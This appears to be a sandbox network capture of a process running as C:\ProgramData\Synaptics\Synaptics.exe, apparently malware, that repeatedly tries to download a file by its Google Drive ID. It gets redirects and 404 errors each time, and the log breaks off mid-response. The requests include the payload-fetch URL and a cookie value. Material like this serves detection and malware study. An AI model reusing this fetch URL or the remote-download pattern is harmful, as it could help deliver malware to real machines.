                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-i0FwZ7aiQyqQ8iHDFlV7uA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49764 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:16 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:17 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6Tx6tBfmQh65dyzHPF0TNM06jtUDHQON5uBt6FA90nx3HeEgLYrm076K4Dt66uazWy
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-plfEgZaNX81gChnJ6Lr7-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:17 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:17 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="VDGFuvdDMv61RzqP2nWrRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:17 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49765 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:17 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kZHkkSX_aFqu-Aa8taPKoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49766 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:17 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:17 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5S2IJ7GxATRRBPJL5WO93IJQulfmVN9N-PBfbHSBb4VIp0s41lyDZh_zNSbtdMmFJB
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pqzDrSWGpnO8A8-9GLRIZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:17 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:17 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="mwQB0lCntNmEtds9ICWhZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:17 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49767 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:17 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-JJmWztadOuGcH_nCQXXH6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49768 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:17 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:18 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6Cy3AGllTAKo31nhVbw7zqsunY3CNSXYX97cBzLD76JYmjgc70HlC3G6gbHzcE5zuikGGz16I
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:17 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UzVx6tpCgm61b0isduHATQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:18 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:18 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="9rOPw9qY11VGN6W1EtSp1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:18 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49775 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:19 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-_FnCFEbPV2xlZebV7Ifz5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 49774 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:19 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:19 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5uMXZaWKo8OSbt-Gufc0vAw4CjyATnzNdoVOuV5MxEIAzOarak5NFrLhV1uwfqAKSLWQXBaO4
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-anw75W2Z8RTAExN_miqBKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:19 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:19 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="chA6PIsmuKx_RyJEjXD8sw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:19 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 49773 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:19 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-xVsVaG9gYu0uTYGWMoCScg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 49778 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:20 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:20 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7nq3ie3sCGiqAw6NBRXuADWysTFG4vtjmkwPjav_8PJwv5TtZvxIGM9bVk2o9THE73OM_7BsQ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EP0hyBAuVZ_T3BJkXo8IqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:20 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
